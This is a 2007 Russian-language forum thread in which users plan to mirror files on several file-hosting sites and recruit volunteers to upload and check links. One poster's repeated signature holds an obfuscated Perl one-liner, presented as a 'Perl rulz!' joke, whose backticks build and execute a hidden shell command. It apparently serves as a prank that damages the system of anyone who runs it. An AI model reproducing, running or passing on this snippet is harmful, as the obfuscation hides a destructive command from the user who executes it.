Добавлено: Чт Дек 06, 2007 9:54 pm Заголовок сообщения: пизда со всеми вытекающими
вобщем смысл такой, пока неизвестно ничего прошу выбирать куда лчше заливать, имеется в виду мегааплод и тп, говорите кто какие знает
еще не помешало бы 2-3 добровольца, которые бы помогали заливать и раз в 2 недели помогали проверять битость ссылок _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Последний раз редактировалось: ALuserX (Вс Сен 21, 2008 12:17 am), всего редактировалось 1 раз
на счет доюровольцев) у меня канал 128 в обе стороны) в принципе помочь не впадлу, но лить буду долго) _________________ Скажи, что я ее люблю... Без нее вся жизнь равна нулю, из-за нее вся жизнь равна нулю... (с) А.Васильев
У тоб? так багато стор?н, я просто не розум?ю... Я просто хочу спитати тебе, чому ти наст?льки красива!?... (с) Олег Собчук
Цитаты дня:
xxx
Я много зарабатываю
xxx
Я работаю ртом
xxx
Я певица
yyy
а с личной жизнью все в порядке?
zzz
угу, еще как! Полный порядок. Мы никогда не ссоримся, не надоедаем друг другу и вообще во всем абсолютное согласие и единение
кто сказал что качать можно будет только с одного источника?
ввди неудобств я предполагал по 3-5 ссылок на кажый файл на разных сайтах, поэтому и нужны помощники, например я кидаю на ифолдер, генж оттуда тянет, потом я кидаю на рапиду, он на мегааплод, качает еще ктото, льет на файлфактори и тд _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
genj
у меня с ифолдера вообще не качается _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!